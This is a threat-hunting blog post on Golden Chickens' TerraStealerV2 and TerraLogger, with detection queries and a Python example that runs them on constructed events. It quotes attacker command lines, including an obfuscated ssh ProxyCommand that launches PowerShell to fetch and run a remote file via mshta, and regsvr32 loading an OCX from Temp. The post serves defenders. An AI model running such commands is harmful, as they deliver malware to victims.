123. Hunting for Golden Chickens' New Malware

Hello everyone!

Insikt Group uncovered two new malware families: TerraStealerV2 and TerraLogger. Both were attributed to the threat actor known as Golden Chickens, an adversary that operates a Malware-as-a-Service (MaaS) platform and provides its tools to other criminals.

I've looked through the report, and (as always) caught a few detection and hunting opportunities.

For example, the adversary abused the ProxyCommand option of ssh.exe to launch PowerShell:

ssh.exe" -o ProxyCommand="powershell powershell ('datashieldsecure.com nikbfgppdkfjsfj msh ta run.mp4 http:'|Convert-String -E '1 2 3 4 5 6=34 6//1/2/5')"

We can hunt for similar activity using the following query:

event_type: "processcreatewin"

AND

proc_file_name: "ssh.exe"

AND

cmdline: "proxycommand"

Next, regsvr32.exe was abused to execute a malicious OCX file:

regsvr32.exe /s /i C:\Users\[redacted]\AppData\Local\Temp\2549828850.ocx

We can use the following query to hunt for executions of OCX files from Temp folders:

event_type: "processcreatewin"

AND

proc_file_name: "regsvr32.exe"

AND

cmdline: "temp" AND "ocx"

One more thing: the stealer uses ifconfig[.]me to collect the compromised system's external IP address. We can use that for hunting as well:

event_type: "dnsreq"

AND

dns_rname: "ifconfig.me"
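To show how the three queries above behave as detection logic, here is an added example (my own illustrative code, not from the Insikt Group report or from any vendor product) that applies them to constructed sample telemetry. The event field names (event_type, proc_file_name, cmdline, dns_rname) are assumed to mirror the query syntax in the post, and every event below is constructed for the example, not a real capture. The username in the OCX path is a made-up stand-in for the redacted value in the report.

```python
"""Apply the post's three hunting queries to constructed sample events.

Illustrative code only: field names are assumed to match the query syntax
used in the post, and all events are constructed, not real telemetry.
"""

# Constructed sample telemetry, shaped like the fields used in the queries.
SAMPLE_EVENTS = [
    {  # should match rule 1: ssh.exe used to launch PowerShell via ProxyCommand
        "event_type": "processcreatewin",
        "proc_file_name": "ssh.exe",
        "cmdline": 'ssh.exe -o ProxyCommand="powershell powershell (...)"',
    },
    {  # ordinary ssh.exe use, should not match
        "event_type": "processcreatewin",
        "proc_file_name": "ssh.exe",
        "cmdline": "ssh.exe user@jumphost.example",
    },
    {  # should match rule 2: regsvr32 registering an .ocx from a Temp folder
        "event_type": "processcreatewin",
        "proc_file_name": "regsvr32.exe",
        "cmdline": r"regsvr32.exe /s /i C:\Users\alice\AppData\Local\Temp\2549828850.ocx",
    },
    {  # regsvr32 with a library outside Temp and not an .ocx, should not match
        "event_type": "processcreatewin",
        "proc_file_name": "regsvr32.exe",
        "cmdline": r"regsvr32.exe /s C:\Windows\System32\example.dll",
    },
    {  # should match rule 3: DNS lookup of ifconfig.me (external IP discovery)
        "event_type": "dnsreq",
        "dns_rname": "ifconfig.me",
    },
    {  # unrelated DNS lookup, should not match
        "event_type": "dnsreq",
        "dns_rname": "update.example.com",
    },
]


def rule_ssh_proxycommand(ev):
    """Query 1: ssh.exe process creation with ProxyCommand in the command line."""
    return (ev.get("event_type") == "processcreatewin"
            and ev.get("proc_file_name", "").lower() == "ssh.exe"
            and "proxycommand" in ev.get("cmdline", "").lower())


def rule_regsvr32_temp_ocx(ev):
    """Query 2: regsvr32.exe command line mentioning both 'temp' and 'ocx'."""
    cmd = ev.get("cmdline", "").lower()
    return (ev.get("event_type") == "processcreatewin"
            and ev.get("proc_file_name", "").lower() == "regsvr32.exe"
            and "temp" in cmd and "ocx" in cmd)


def rule_ifconfig_me_dns(ev):
    """Query 3: DNS request for ifconfig.me (trailing dot tolerated)."""
    return (ev.get("event_type") == "dnsreq"
            and ev.get("dns_rname", "").lower().rstrip(".") == "ifconfig.me")


# Rule names correspond to the three queries in the post, in order.
RULES = {
    "ssh_proxycommand": rule_ssh_proxycommand,
    "regsvr32_temp_ocx": rule_regsvr32_temp_ocx,
    "ifconfig_me_dns": rule_ifconfig_me_dns,
}


def hunt(events):
    """Return (rule_name, event_index) pairs for every event matching a rule."""
    hits = []
    for i, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, i))
    return hits


if __name__ == "__main__":
    for name, i in hunt(SAMPLE_EVENTS):
        print(f"[{name}] event {i}: {SAMPLE_EVENTS[i]}")
```

The rules deliberately mirror the queries' matching style: exact match on the process image name, case-insensitive substring match on the command line, and an exact hostname match for the DNS rule. When rolling these out, the ssh.exe rule in particular will need an exclusion list for any legitimate ProxyCommand configurations (jump hosts, corporate SSH tooling) seen in your environment.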

Make sure you've checked the report - it's full of detection ideas!

See you tomorrow!
